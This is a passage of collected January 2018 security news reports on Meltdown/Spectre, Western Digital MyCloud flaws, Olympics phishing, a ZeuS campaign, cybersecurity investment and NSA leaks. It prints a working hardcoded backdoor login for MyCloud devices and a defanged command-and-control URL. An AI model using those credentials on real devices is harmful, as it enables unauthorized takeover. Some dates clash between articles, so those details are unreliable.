The vulnerabilities also affect VMware’s vSphere Data Protection (VDP) product. VMware informed customers of the issues on January 2, but it did not reference Digital Defense or EMC. Digital Defense told SecurityWeek that VMware’s VDP is a derivative of the EMC product and EMC informed VMware of the security bugs.


Lawsuits Filed Against Intel Over CPU Vulnerabilities
8.1.2018 securityweek Vulnerability
At least three class action lawsuits have been filed against Intel in the past days over the recently disclosed vulnerabilities that could allow malicious hackers to obtain potentially sensitive information from computers.

The Meltdown and Spectre attack methods uncovered by several independent research teams work not only against Intel processors, but also against CPUs from AMD and ARM. Intel has been hit the hardest – even its stock went down after initial reports claimed only Intel processors were affected – but the company says media reports describing the design flaws are overblown.

The lawsuits, all seeking class action status, have been filed in the Northern District of California, the Southern District of Indiana, and the District of Oregon, and they accuse Intel of violating state consumer protection laws. All complaints demand a jury trial.

In California, Branstetter, Stranch & Jennings of Nashville and Doyle APC of San Diego filed a consumer fraud case, accusing Intel of misleading consumers about the performance and reliability of its processors by selling a product with “fatal” security flaws.

The complaint filed in Indiana alleges that “Intel committed unfair and deceptive acts by representing that the Intel CPUs had performance, characteristics, or benefits which Intel knew or should reasonably have known they did not have.”

The chip giant has also been accused of breaching warranties by selling defective CPUs that it’s not willing to repair or replace free of charge. The Indiana lawsuit also claims the company was negligent in the manufacture and design of its processors.

In Oregon, plaintiffs say they are entitled to restitution based on Intel’s “intentional and knowing failures to disclose material defects.” The complaint claims plaintiffs would have acquired a CPU from an Intel competitor had they known about the flaws and the fact that they will end up with a slower product.

The Meltdown and Spectre attacks allow malicious applications to bypass memory isolation mechanisms and access potentially sensitive data, including passwords, photos, documents, emails, and data from instant messaging apps. The bugs that make these attacks possible are said to date back 20 years.

Intel and other major tech companies have started releasing patches and workarounds for the vulnerabilities, and many believe it’s enough for the time being. Some have suggested that Intel may need to recall impacted CPUs, but the vendor says that will not happen considering that the issue can be mitigated at software level.

Significant performance penalties have been observed in some cases, but Intel says most consumers will not experience any problems, and it’s confident that any penalties will be mitigated over time.

AMD has confirmed that some of the flaws also affect its own processors, but claims the risk of attacks is “near zero.” ARM, whose technology is used by Apple and Qualcomm, also confirmed that nearly a dozen of its Cortex CPUs are impacted.


Hardcoded Backdoor Found on Western Digital Storage Devices
8.1.2018 securityweek Vulnerability
Firmware updates released by Western Digital for its MyCloud family of devices address a series of security issues, including a hardcoded backdoor admin account.

The vulnerabilities were found in WDMyCloud firmware prior to version 2.30.165 and are said to affect devices such as MyCloud, MyCloudMirror, My Cloud Gen 2, My Cloud PR2100, My Cloud PR4100, My Cloud EX2 Ultra, My Cloud EX2, My Cloud EX4, My Cloud EX2100, My Cloud EX4100, My Cloud DL2100, and My Cloud DL4100.

Discovered by GulfTech security researcher James Bercegay, the security flaws could be exploited to achieve remote root code execution on the affected WD My Cloud personal cloud storage units (the device is currently the best-selling NAS (network attached storage) device on Amazon).

One of the most important security issues the researcher found was an unrestricted file upload vulnerability created by the “misuse and misunderstanding of the PHP gethostbyaddr() function,” the researcher says.

The vulnerable code in said file allows an attacker to define a remote auth server, which could be an attacker-controlled server. The result should fail if an invalid host is defined, but a series of bugs result in checks being skipped, eventually allowing an attacker to abuse the issue “to upload any file to the server that they want.”

While analyzing CGI binaries on the webserver, the security researcher discovered code where login functionality would specifically look for an admin user named “mydlinkBRionyg” and would accept the password “abc12345cba”.

The researcher then discovered that the backdoor could be turned into a root shell that would allow an attacker to execute any commands as root and gain control of the affected device. Damaging a vulnerable device would be extremely easy and would not require authentication.

“The triviality of exploiting this issues makes it very dangerous, and even wormable. Not only that, but users locked to a LAN are not safe either. An attacker could literally take over your WDMyCloud by just having you visit a website where an embedded iframe or img tag make a request to the vulnerable device using one of the many predictable default hostnames for the WDMyCloud such as "wdmycloud" and "wdmycloudmirror" etc.,” Bercegay explains.

In addition to the two critical vulnerabilities, the security researcher discovered a series of other dangerous issues as well in the WDMyCloud firmware. These bugs, however, are not deemed Critical, especially since some of them require authentication to be exploited.

The WDMyCloud web interface was found to lack effective cross-site request forgery (CSRF) protection, and exploitation of the issue is trivial, the researcher says. WDMyCloud is also plagued by a series of command injection issues. An attacker can abuse the language preferences functionality to cause a denial of service against the web interface and can dump a list of all users, including detailed user information.

The researcher also discovered that the exact same mydlinkBRionyg backdoor account was found in the D-Link DNS-320L ShareCenter NAS device a while back, supposedly because both devices shared common firmware code. However, the issue was addressed in D-Link DNS-320L with firmware version 1.0.6, released in July 2014.

“It is interesting to think about how before D-Link updated their software two of the most popular NAS device families in the world, sold by two of the most popular tech companies in the world were both vulnerable at the same time, to the same backdoor for a while. The time frame in which both devices were vulnerable at the same time in the wild was roughly from early 2014 to later in 2014 based on comparing firmware release note dates,” Bercegay notes.

The researcher reported all these vulnerabilities to the vendor in June 2017. Firmware release 2.30.174 should address all of these issues.


Microsoft Patches for CPU Flaws Break Windows, Apps
8.1.2018 securityweek Vulnerability
Users have complained that the updates released by Microsoft last week for the Spectre and Meltdown vulnerabilities cause Windows to break down on some computers with AMD processors.

Several individuals whose computers rely on AMD processors, particularly older Athlon models, say they are unable to start Windows 10 after installing KB4056892, an update released by Microsoft in response to the disclosure of serious flaws affecting Intel, AMD and ARM processors.

The security holes have been dubbed Spectre and Meltdown and they allow malicious applications to bypass memory isolation mechanisms and access passwords, photos, documents, emails, and other sensitive information. Both local and remote exploitation are possible.

Users have reported that after installing Microsoft’s update the operating system freezes during boot when the Windows logo is displayed. Some users claimed to have had problems reverting to a previous state, and those who did manage to do it warned that the automatic update feature needs to quickly be disabled to prevent the update from being reinstalled.

While a majority of the affected users appear to have older AMD Athlon processors, some devices with AMD Turion CPUs also appear to have been hit.

Microsoft has not shared any information regarding this issue. A Microsoft spokesperson told SecurityWeek that the company is aware of the reports and is investigating.

Users have reported other problems as well after installing KB4056892. Owners of Asus devices say they receive an error message related to an Asus utility after updating.

The Spectre/Meltdown updates appear to break the PulseSecure VPN on both Windows 10 and Windows 8.1 – the patch for Windows 8.1 is included in KB4056898. The VPN vendor has released patches to address the issue.

Some Windows users report that they simply cannot install the patches for the CPU vulnerabilities, and some say their web browsers have started crashing after applying the update.

Shortly after releasing the Meltdown/Spectre updates, Microsoft warned that it had identified some compatibility issues with some antivirus products. The company informed users that if they had not been offered the security updates, they may be running an incompatible antivirus application.


Cybersecurity's Venture Capital and Private Equity Money-go-Round
8.1.2018 securityweek Cyber
Access to Money at the Right Time is Essential for Cybersecurity Firms Given the Volatility of the Market

Security firms bought by and consumed within larger firms can easily lose their way. It happened with McAfee, bought by Intel in 2010 for $7.68 billion, and extracted with a 51% purchase by private equity (PE) firm TPG in April 2017. The extraction valued McAfee at only $4.2 billion.

McAfee will be hoping that it can emulate SonicWall -- which also lost its way after being bought by Dell (from Thoma Bravo) in 2012. In the summer of 2016, Francisco Partners and Elliott Management extracted SonicWall (along with Quest Software) for a price reported by Reuters to be around $2 billion. Thoma Bravo did not disclose the price Dell paid for SonicWall, but the Wall Street Journal suggested it was $1.2 billion.

Dell acquired Quest Software for $2.4 billion in 2012 -- making the combined cost of the two firms somewhere in the region of $3.6 billion. In short, the two firms together fell in value from $3.6 billion to just $2 billion in the five years they spent as part of Dell.

Since then, SonicWall has been turned around under PE guidance and the stewardship of CEO Bill Connor. A little over a year after purchasing the two firms, Francisco Partners announced that it had completed a $2 billion debt refinancing, due to the strong operating performance of the firms. The refinancing was significantly oversubscribed, it reduces the operating overheads of the firms, and positions them nicely for further growth.

Private Equity in Cybersecurity

Access to money at the right time (and a few other things like the right management team) is essential for cybersecurity firms given the volatility of the market in both emerging start-ups and changing technology. This means that finding the right backers and understanding the investment market could be fundamental to the prospects of almost any cybersecurity firm. Excluding the unknown potential of the new small-scale crowdfunding options, there are three primary sources of serious money: angel investment, venture capital (VC) and private equity (PE).

'Angels' tend to be individuals -- or possibly collections of individuals -- who invest their own money in promising ideas. They are often important in getting a new company started; but do not normally have sufficient funds to take a growing company to the next level.

That next level of funding generally comes from venture capital (VC). VC funds "like Paladin, Amadeus and others step in to provide capital to entrepreneurs just after their angel or ‘proof of concept' phase of funding," explains Nazo Moosa. Moosa this year formed a new European VC firm called VT Partners, with the express purpose of injecting U.S.-style funding and growth into the under-performing European cybersecurity company market.

The key point for VC is that it funds new companies with new ideas. At this stage they are promising rather than proven; some will succeed, many will fail. Because of the additional risk to the investors, VC money is invested at high interest rates. This is the biggest problem area for the cybersecurity industry -- because of the high interest rates, returns need to be made relatively fast, and/or additional investment found. A company's value is often based on the number of its users, so sales can in many cases be more important than further product development.

Of course, not all VC firms are there just for a quick return. Dan Schiappa, Sophos SVP and GM, explains, "The top echelon investors are not in it for the quick turnaround, but instead they are long-term investors that will add value to a management team and towards building a long term viable company." But he adds, "VCs who look to build a company for acquisition from the get-go are the ones to avoid, as they may drive behaviors that are not beneficial to customers or product quality."

The problem is that cybersecurity attracts both types of VC money, simply because it is hot. "Everybody is under attack all of the time," comments Connor, "from other countries, cybercriminals, and hacktivists. So it's a hot area and hot areas tend to attract a lot of opportunity and a lot of money. From that there are a lot of start-ups with new 'silver bullets' that attract VC."

Schiappa believes there is a common cycle for new security companies. Initial idea and development is followed by VC investment. The money enables strong marketing, which effectively makes or breaks the business depending on the inherent strength of the initial product.

"At the end of the day," Schiappa explains, "much of the problem is that tech entrepreneurs follow the logic of getting product out as quickly as possible and gaining feedback. While in some circumstances that is a good and viable strategy, in others, it produces low quality products, that may be innovative, but are not suitable to build a scalable business. Startups get hyped, their innovation gets adopted; but then -- when they hit a scale that goes beyond the business or the product -- they enter the trough of sorrow, where investment is needed to build the product properly. During this period of time, you usually see a pickup in marketing in order to keep the momentum going. It can take years for a company to exit the trough with the quality product and business operations to scale to a legitimate business."

The problem for the cybersecurity industry is that new ideas do not often have 'years' to spare; they are constantly being supplanted by new and different ideas and technology.

"The hype cycle is where a startup can make it or break it," he continues. "If they are building quality products during the hype cycle, they will withstand the scale and not enter the trough, or enter it very briefly. Those who ship a product that is barely more than a prototype are destined for disaster."

Some VC investors collude in this cycle by insufficiently understanding cybersecurity. "There is a lot of money at play in the security space," warns Connor, "because it's such an interesting area, and an area that's not going to go away -- and there's also a lot of money that doesn't really understand security. It's not necessarily dumb money, but it's at risk in this space."

A good VC is not just a money lender -- it's a mentor who, adds Schiappa, "will guide the company properly and even provide technical advisers who can ensure that the product is built with production quality."

Company founders and private investors usually have one common long-term aim -- to maximize a return on their time and capital. There are three primary routes: sale to a larger company; going public and raising money on a stock exchange; and attracting the next level of private investment. The next level is 'private equity'. It is 'big money' that generally becomes available to companies that have been through the early growth phases of venture capital and have demonstrated the potential for future growth.

PE differs from VC in two primary ways: firstly there is generally more money available than there is in VC; and secondly, PE usually seeks to take a greater stake in the company -- if not actual ownership -- rather than simply investing in it. "PE firms tend to take on more ownership and liability of a company," comments Nathan Wenzler, "and so, they tend to have a stronger motivation to invest in the long term viability of it."

In this way, private equity firms play a different role in the evolution of a company. A PE firm looks for demonstrable potential. It is not interested in firms that have maxed their potential, but in firms that are perhaps slightly under-performing.

"They tend," explains Schiappa, "to acquire a company that has been an established vendor, has meaningful billings and revenues, but might not be operating at its full potential." SonicWall and McAfee both fit this bill. By improving performance, the PE firm will be able to gain its own return through one of two exit strategies: sale to a big security firm (or a larger PE firm); or going public. Unlike the majority of VC firms, PE tends to take a longer term view of the growth of its investment.

One method of improving performance -- beyond simply injecting capital -- is to strengthen the management team. A PE firm, says Schiappa, will "typically bring in professional leaders to guide the company to the public markets or to a larger exit. The PE firm is definitely investing with an exit in mind and their goal is to build value in the asset towards meeting that need. In most cases it is always beneficial to the company and their strategy and operations."

When Francisco Partners acquired SonicWall from Dell, it was because SonicWall was losing its way despite having proven product, and therefore potential. "What Francisco Partners saw," explains Connor, "was a multiple $100m dollar company where the revenue was going down. It was losing money, but some of us -- and that included myself -- knew that the company had been growing before and made money before; both when it was private and public. So we knew it just needed to get restructured, or rebuilt and refocused -- which is what I've done over the last years."

The first thing the PE company did was to bring in Bill Connor as the new CEO. Connor already had successful experience in working with a PE firm, having taken Entrust through its four-year period with Thoma Bravo to its sale to the Datacard Group in 2013; for what he says was six and a half times the PE firm's original investment.

This is the cybersecurity money-go-round. VC firms look for the next silver bullet that could give the investors a high return over a short period. It tends to be new technology or an innovative idea; but there is no company track record. The risks are higher, so the cost of the money is more expensive. This can lead to increased pressure on the company to grow as fast as possible. If that growth can be sustained, the company will succeed; if it cannot, it will fail.

If the company succeeds, it can then become a target for private equity investment. That company now has a track record, but PE is looking for the potential for even greater growth through a combination of additional funds and perhaps improved leadership. There are, and there always will be, casualties -- both among silver-bullet companies that prove lackluster and among buyers of their products. During the hype phase of VC, users can be persuaded to buy a product that under-performs and ultimately fails -- and that could prove costly to the user beyond the price of the product. The PE phase is more stable. PE firms are confident that the product is good and the market is strong.

Overall, the system works. By far the majority of big cybersecurity firms are U.S.-based, with only a handful of European firms reaching a similar scale. It is no coincidence that the U.S. has five times the venture funding of Europe. But to use the system profitably, new companies need to choose the right VC investment in their early years. Cybersecurity firms should examine the track record of VC firms just as closely as PE firms examine the track record of the cybersecurity firms.

Incidentally, Dell, which first bought SonicWall and then sold it to PE firms Francisco Partners and Elliott Management, has its own investment history. It started in 1984 with Michael Dell building and selling personal computers while he was a student at the University of Texas at Austin, using $1,000 capital provided by his family. As he proved his worth, his family increased their 'investment' to a loan of $500,000, similar to early stage 'angel' investments.

As his firm grew, Dell did not proceed to the venture capital stage. Instead, he hired a retired merchant banker and venture capitalist, Lee Walker, as president and CEO. Walker helped secure the firm's first serious credit -- a bank's line of credit for $10 million. Dell also skipped the private equity stage, raised capital in a private placement in 1987 and went public via an initial public offering in 1988. Michael Dell retained a significant position in the company, but no longer had personal control.

During the 1990s, the company continued to prosper, but started to suffer from the increasing commoditization of personal computers after 2000, and the later effect of mobile devices on the PC market. Dell's market dominance declined -- but in 2013 Dell announced that Michael Dell and Silver Lake Partners, together with a $2 billion loan from Microsoft, would take the company private in a $24.4 billion leveraged buyout deal. In essence, Michael Dell used private equity to escape from public ownership rather than the more usual route of using it to prepare for public ownership.

It was the PE-backed Dell that announced the purchase of EMC for $67 billion in October 2015, completing the deal in September 2016. The combined companies became Dell Technologies, the world's largest privately controlled integrated technology company, which also includes security industry pioneer RSA.


Microsoft KB4056892 Meltdown/Spectre patch bricks AMD Athlon-powered machines
8.1.2017 securityaffairs
Vulnerability

Many users claim the Security Update for Windows KB4056892, the Microsoft Meltdown/Spectre patch, bricks AMD Athlon-powered machines.
The Meltdown and Spectre vulnerabilities will continue to create a lot of problems for users and chip vendors.

As you know, tech giants like Apple, Cisco and Microsoft have acknowledged that their products are affected and started rolling out security patches.

While many experts argued that the fixes would have a significant impact on the performance of affected devices, Intel confirmed that extensive testing conducted by tech giants (Apple, Amazon, Google, and Microsoft) to assess any impact on system performance from the security updates did not reveal negative effects.

Unfortunately, the problems are not over: the fix released by Microsoft for the Meltdown and Spectre attacks (Security Update for Windows KB4056892) is bricking some AMD PCs, in particular Athlon-powered machines.

Recall that AMD CPUs are not susceptible to the Meltdown attack and are vulnerable only to Spectre attacks.


In this thread on answers.microsoft.com, many users claim that the Security Update for Windows KB4056892 bricks some AMD-powered PCs and leaves them stuck on the Windows startup logo.

“I have an older AMD Athlon 64 X2 6000+, Asus MB; after installation of KB4056892 the system doesn’t boot, it only shows the Windows logo without animation and nothing more. After several failed boots it does a roll-back, then it shows error 0x800f0845. Unfortunately, it seems it’s not easy to disable the automatic updates without gpedit tweaks, so it tries installing and rolling back the update over and over.” reported an angry user.

Athlon-powered systems stopped working right after the patch was installed, and worse, the fix does not create a recovery point, so rollback is in some cases not possible.

Some users reported that even re-installing Windows 10 doesn’t solve the problem.

Affected users will need to disable Windows Update, but only Microsoft can resolve this embarrassing situation for its AMD users.

At the time of writing, the thread did not include any response from Microsoft.


Following recent mass demonstrations, Iran's Infy group may attempt to target protesters and their foreign contacts
8.1.2017 securityaffairs BigBrothers

Following the recent mass demonstrations, the Iran-linked Infy group may attempt to target protesters and their contacts abroad.
The Iranian authorities' crackdown on protesters and dissidents could be wide-ranging and involve anyone in contact with them.

According to cybersecurity firms and researchers, a nation-state actor called Infy is intensifying its attacks against anyone who is in contact with protesters.

The state-sponsored hackers target victims with spear-phishing messages that are constantly refined and improved.

According to experts at Palo Alto Networks, the Infy group has been active since at least 2007, and its malware has been involved in attacks both inside the country and abroad.

The name Infy comes from a string the malware authors used in filenames and in command and control (C&C) folder names and strings.


The Infy malware was first submitted to VirusTotal in August 2007, while the C&C domain used by the oldest sample spotted by the experts has been associated with a malicious campaign dating back to December 2004.

The malware evolved over the years; the authors improved it by implementing new features, such as support for the Microsoft Edge web browser, which was introduced in version 30.

Unlike other Iranian nation-state actors who target foreign organizations, the Infy group appears focused on opponents and dissidents.

Researchers Collin Anderson and Claudio Guarnieri, authors of the research titled “Iran and the Soft War for Internet Dominance,” confirmed that the Infy attackers were responsible for a large number of attempted malware attacks against Iranian civil society since late 2014.

In response to the recent mass demonstrations, the Iranian government also tried to isolate the protests by blocking internet access on mobile networks; the authorities also blocked Instagram and messaging services such as Telegram.

Security experts believe that protesters will be targeted by the Infy actor and that its malware will be used against anyone who has any kind of relationship with them.


Spear phishing attacks already targeting Pyeongchang Olympic Games
8.1.2017 securityaffairs
Phishing

Hackers are already targeting the Pyeongchang Olympic Games with spear phishing attacks aimed at stealing sensitive or financial information.
Security researchers from McAfee reported that hackers are already targeting the Pyeongchang Olympic Games, and that many organizations associated with the event have received spear phishing messages.

Most of the targeted organizations are involved with the Olympics, either in providing infrastructure or in a supporting role.

“Attached in an email was a malicious Microsoft Word document with the original file name 농식품부, 평창 동계올림픽 대비 축산악취 방지대책 관련기관 회의 개최.doc (“Organized by Ministry of Agriculture and Forestry and Pyeongchang Winter Olympics”).” reported McAfee.

“The primary target of the email was icehockey@pyeongchang2018.com, with several organizations in South Korea on the BCC line. The majority of these organizations had some association with the Olympics, either in providing infrastructure or in a supporting role.”


The campaign began on December 22; the attackers used spoofed messages that pretended to come from South Korea’s National Counter-Terrorism Center.

The hackers spoofed the sender to appear to be info@nctc.go.kr, the address of the National Counter-Terrorism Center (NCTC) in South Korea. The analysis revealed that the email was actually sent from an address in Singapore and referred to alleged antiterror drills in the region in preparation for the Olympic Games.

The attackers attempt to trick victims into opening a document in Korean titled “Organized by Ministry of Agriculture and Forestry and Pyeongchang Winter Olympics.”

Initially, the malware was embedded in the malicious document as an HTML Application (HTA) file; later, the threat actors started hiding the malicious code in an image on a remote server and used obfuscated Visual Basic macros to launch the decoder script. Researchers also noted that the attackers wrote custom PowerShell code to decode the hidden image and launch the malware.

“When we deobfuscate the control server URLs, the implant establishes a connection to the following site over SSL:

hxxps://www.thlsystems.forfirst.cz:443/components/com_tags/views/login/process.php” continues the analysis.

“Based on our analysis, this implant establishes an encrypted channel to the attacker’s server, likely giving the attacker the ability to execute commands on the victim’s machine and to install additional malware.”

The experts expect more hacking campaigns targeting entities involved in sporting events like the Pyeongchang Olympic Games.

“With the upcoming Olympics, we expect to see an increase in cyberattacks using Olympics-related themes,” the McAfee report concluded.

“In similar past cases, the victims were targeted for their passwords and financial information.”


US National Security Agency Director Admiral Mike Rogers to Retire
8.1.2017 securityaffairs BigBrothers

After a four-year term, National Security Agency Director Admiral Mike Rogers plans to retire; he sent a letter to his staff on Friday informing them that he would depart next spring.
After a four-year term, National Security Agency chief Admiral Mike Rogers plans to retire within months.

Admiral Mike Rogers was chosen by President Barack Obama in 2014 to replace Gen. Keith Alexander. He was nominated for his significant experience in the cybersecurity field: as head of Fleet Cyber Command, he had dealt with cyber defense and offense policy issues.


The news was confirmed by US intelligence sources; Admiral Mike Rogers, who also led US Cyber Command, sent a letter to his staff on Friday informing them that he would depart next spring.

Rogers's successor will be nominated by President Donald Trump this month.

Rogers is in opposition to Trump; The Observer recently reported that he admitted, in a private town-hall-style meeting with NSA staff, that Donald Trump did, in fact, collude with the Russians.

Rogers, along with other US security chiefs, presented a report to Trump on January 6, 2017 saying that Russians had interfered in the 2016 presidential election.

Unfortunately, during his tenure the agency faced the clamorous and disconcerting leak of exploits and hacking tools from its arsenal.


Experts found a strain of the Zeus banking Trojan spread through a legitimate developer’s website
8.1.2017 securityaffairs
Virus

Malware researchers at Talos group have discovered a strain of Zeus banking Trojan that abuses the legitimate website of the Ukraine-based accounting software developer Crystal Finance Millennium (CFM).
The experts discovered that the version of the ZeuS banking Trojan used in this attack is 2.0.8.9, which was leaked in 2011.

The attack occurred in August 2017, during the time frame associated with the observance of the Independence Day holiday in Ukraine, but researchers from Talos have only now disclosed details of the attack.

Experts found many similarities with the attack vector used in the NotPetya case. While in the NotPetya attack hackers compromised the supply chain of the software firm M.E.Doc to distribute the malware, in the case of the Zeus banking Trojan the threat actors relied on accounting software maker CFM’s website being used to distribute malware fetched by downloaders delivered as attachments in an email spam campaign.

Researchers from Talos were able to register and sinkhole one of the Command and Control (C2) domains used by the attackers; in this way they gathered information about the number and nature of the infected systems.

Attackers used spam emails with a ZIP archive containing a JavaScript file, which was used as a downloader. The researchers discovered that one of the domains used to host the malware payload was associated with CFM’s website; the attackers also used it to distribute PSCrypt ransomware.

The analysis of the infection process revealed that, once executed, the malware first performs a long list of anti-VM checks to determine whether it runs in a virtualized environment. If not, the malicious code achieves persistence by creating a registry entry to ensure execution at system startup.

Then the malware attempts to connect to several C&C servers; experts from Talos discovered that one of them was not registered at the time of the analysis, a gift for the researchers, who used it to sinkhole the botnet.

Most of the infected systems were located in Ukraine, followed by the United States.

“Interestingly, most of the systems which beaconed to our sinkhole server were located in Ukraine with United States being the second most affected region. A graph showing the ISPs that were most heavily affected is below:”


“As can be seen in the graph above, PJSC Ukrtelecom was by far the most heavily affected. This ISP is the company governed by the Ministry of Transportation and Communications in Ukraine. In total, our sinkhole logged 11,925,626 beacons from 3,165 unique IP addresses” states the analysis from Talos.

According to Talos, hackers are refining their attack techniques and are increasingly attempting to abuse the trust relationship between organizations and their trusted software manufacturers.


Qualcomm Working on Mitigations for Spectre, Meltdown
8.1.2018 securityweek
Vulnerability
Qualcomm has confirmed that some of its products are affected by the recently disclosed Spectre and Meltdown vulnerabilities, but the company says mitigations are being deployed.

The chipmaker has provided few details, but claims it has been working with ARM and others to assess the impact of the flaws. Mitigations have been developed and Qualcomm is in the process of incorporating them into impacted products.

“We are in the process of deploying these mitigations to our customers and encourage people to update their devices when patches become available,” the company stated.

Qualcomm’s processors, used in devices from several major vendors, include CPU, GPU, modem, audio, and camera components. Some of the systems rely on ARM CPU cores that have been confirmed to be affected by the Spectre (CVE-2017-5753 and CVE-2017-5715) and Meltdown (CVE-2017-5754) vulnerabilities.

For example, the Snapdragon 653, 652 and 650 platforms use ARM Cortex-A72 processors, which ARM says are vulnerable to both Spectre exploits and a variant of the Meltdown attack. Moreover, the Snapdragon 845 mobile platform, which Qualcomm unveiled just a few weeks ago, uses a customized version of the Cortex-A75, which is also vulnerable to both Spectre and Meltdown attacks.

Qualcomm is not the only vendor using ARM technology in its products. Apple, whose A-series system-on-a-chip (SoC) also uses ARM processing cores, confirmed that some of its devices are affected.

Raspberry Pis also use ARM cores, but the Raspberry Pi Foundation announced that the models found in its devices – specifically ARM1176, Cortex-A7, and Cortex-A53 – are not impacted by Spectre or Meltdown.

The Meltdown and Spectre attacks allow malicious applications to bypass memory isolation mechanisms and access potentially sensitive data, including passwords, photos, documents, emails, and data from instant messaging apps.

Billions of devices using Intel, AMD and ARM processors are affected and researchers believe attacks are not easy to detect. Experts are concerned that we may soon witness remote attacks.

Attacks can be prevented using kernel page table isolation (KPTI) and a mitigation named Retpoline developed by researchers at Google. Intel, Apple, Microsoft, Google, Amazon and others have already started rolling out patches and workarounds.

However, the mitigations can introduce performance penalties of up to 30 percent for affected processors. While Intel said regular users should not notice any difference and several tech giants claimed they had not seen any meaningful performance impact, some AWS customers have reported problems, and tests conducted by Red Hat showed penalties of up to 19% in the case of operations involving highly cached random memory.


ZeuS Variant Abuses Legitimate Developer’s Website
8.1.2018 securityweek
Virus
The official website of Ukraine-based accounting software developer Crystal Finance Millennium (CFM) was abused for the distribution of a variant of the ZeuS banking Trojan, Talos reports.

The vector is similar to that used in the NotPetya attack in the summer of 2017, when a malicious actor abused the update server of tax software company M.E.Doc to distribute the destructive wiper.

Unlike the NotPetya attack, however, the distribution of the ZeuS variant didn’t leverage a compromised server. Instead, the attack relied on accounting software maker CFM's website being used to distribute malware fetched by downloaders delivered as attachments in an email spam campaign.

The attack happened in August 2016, when information on the malware infection process was made public. Now, Talos has decided to share details on the scope of the attack and associated victims, including the geographic regions affected, based on information the company gathered after it managed to sinkhole command and control (C&C) domains.

The spam emails used in this attack contained a ZIP archive with a JavaScript file inside, which acted as a downloader. One of the domains used to host the malware payload was associated with CFM's website, which has been also observed distributing PSCrypt ransomware, the researchers say.

The malware used in this attack reused code from the version 2.0.8.9 of the ZeuS banking Trojan, which was leaked in 2011 and already spawned numerous other threats.

The malware would first check whether it runs in a virtualized sandbox environment and would enter an infinite sleep function if virtualization was detected. If not, it would then move to achieve persistence by creating a registry entry to ensure execution at system startup.

After infection, the malware attempts to connect to different C&C servers, one of which hadn’t been registered when Talos first started investigating the attack. The researchers then registered the domain, which provided them with insight into the malware’s C&C communications.

Talos discovered that most of the systems beaconing to the sinkhole server were located in Ukraine, with the United States emerging as the second most affected country. They also found out that PJSC Ukrtelecom, a company governed by the Ministry of Transportation and Communications in Ukraine, was the most affected ISP.

A total of 11,925,626 beacons from 3,165 unique IP addresses were logged by the sinkhole server, the researchers reveal.

“Attackers are increasingly attempting to abuse the trust relationship between organizations and their trusted software manufacturers as a means of obtaining a foothold within the environments they are targeting. As organizations deploy more effective security controls to protect their network environments attackers are continuing to refine their methodologies,” Talos concluded.


US National Security Agency Chief to Retire
8.1.2018 securityweek BigBrothers
National Security Agency Director Admiral Mike Rogers, the US signals intelligence czar, plans to retire within months after a four-year term scarred by damaging leaks, US intelligence sources confirmed Friday.

Rogers, who has led the NSA and its sister agency, the US Cyber Command, for four years, told staff in an internal letter Friday that he would depart in the spring, with his replacement to be nominated by President Donald Trump this month.

Named to the position in April 2014 by President Barack Obama, Rogers, 58, has almost completed one year under Trump, who has repeatedly delivered withering criticism of the US intelligence community.

Rogers was one of the four US security chiefs who presented a damning report to Trump on January 6, 2017 saying that Russians had interfered in the 2016 presidential election to boost his candidacy.

Trump has ever since refused to concede that conclusion, and Rogers is the only official who attended the meeting who kept his job through Trump's first year.

Besides keeping up US electronic spying, he has also spearheaded the country's ability to conduct offensive cyber operations, via the Cyber Command, a Pentagon unit.

And he has struggled to deal with the leak of ultra-secret NSA hacking tools, some of which are believed to have fallen into the hands of Russians.

Two former NSA hackers have agreed to plead guilty in recent months to charges of removing classified NSA materials to their homes, but neither has been accused of deliberate leaks.

According to a Washington Post report earlier this week, the NSA's 21,000-strong staff is facing a rapid turnover due to unhappiness with a Rogers-led reorganization and poor pay compared to the private sector.


NSA Contractor Pleads Guilty in Embarrassing Leak Case
8.1.2018 securityweek BigBrothers
A former contractor for the US National Security Agency's elite hacking group has agreed to plead guilty to removing classified documents in a case that highlighted a series of disastrous leaks of top-secret NSA materials.

Harold Martin, who reportedly worked for an NSA unit focused on hacking into target computer systems around the world, will plead guilty to one of 20 counts against him with the aim of concluding a 15-month-old case couched in deep secrecy, according to court documents filed late Wednesday.

The indictment filed on February 8, 2017 accused Martin of hoarding an estimated 50 terabytes of NSA data and documents in his home and car over a 20-year period. The material reportedly included sensitive digital tools for hacking foreign governments' computers.

His arrest in late 2016 followed the NSA's discovery that a batch of its hacking tools had fallen into the hands of a still-mysterious group called the Shadow Brokers, which offered them for sale online and also released some for free.

At least publicly, Martin has not been accused of responsibility for any NSA leaks.

In December, Nghia Hoang Pho, 67, a 10-year veteran of the NSA's Tailored Access Operations hacking unit, was charged with and agreed to plead guilty to one count of removing and retaining top-secret documents from the agency.

Vietnam-born Pho also had taken home highly classified NSA materials and programs.

According to The New York Times, apparent Russian hackers broke into his personal computer to steal the files, accessing them via Pho's use of Kaspersky software.

But that case also has not been linked to the Shadow Brokers theft.

Those leaks, and others from the Central Intelligence Agency, have hobbled the US spy agencies' abilities to hack into the computer systems of foreign governments and other espionage targets, according to intelligence experts.

Martin will officially submit his plea on January 22, according to court filings. He faces up to 10 years in jail and a maximum fine of $250,000.

Sentencing won't take place until the 19 other charges are resolved -- an indication that the government, while entertaining his single-count plea, is not completely satisfied that Martin's actions were harmless.


Hackers Already Targeting Pyeongchang Olympics: Researchers
7.1.2018 securityweek Hacking
Hackers have already begun targeting the Pyeongchang Olympic Games with malware-infected emails which may be aimed at stealing passwords or financial information, researchers said Saturday.

The security firm McAfee said in a report that several organizations associated with the Olympics had received the malicious email with the primary target being groups affiliated with ice hockey.

"The majority of these organizations (targeted) had some association with the Olympics, either in providing infrastructure or in a supporting role," the McAfee report said. "The attackers appear to be casting a wide net with this campaign."

In the attacks, which began as early as December 22, emails were "spoofed" to make them appear to come from South Korea's National Counter-Terrorism Center, which was in the process of conducting antiterror drills in the region in preparation for the Games.

McAfee said the emails came in fact from an address in Singapore, and instructed the readers to open a text document in Korean.

The document was titled "Organized by Ministry of Agriculture and Forestry and Pyeongchang Winter Olympics," according to the report.

The malware in some cases was hidden in text, and later in an image -- a technique known as steganography, according to McAfee.

"Based on our analysis, this implant establishes an encrypted channel to the attacker's server, likely giving the attacker the ability to execute commands on the victim's machine and to install additional malware," McAfee said.

McAfee said it expects more attacks of this nature, echoing warnings last year from University of California researchers of increasing targeting of sporting events.

"With the upcoming Olympics, we expect to see an increase in cyberattacks using Olympics-related themes," the McAfee report said.

"In similar past cases, the victims were targeted for their passwords and financial information."


A new stack-based overflow vulnerability discovered in AMD CPUs
7.1.2018 securityaffairs
Vulnerability

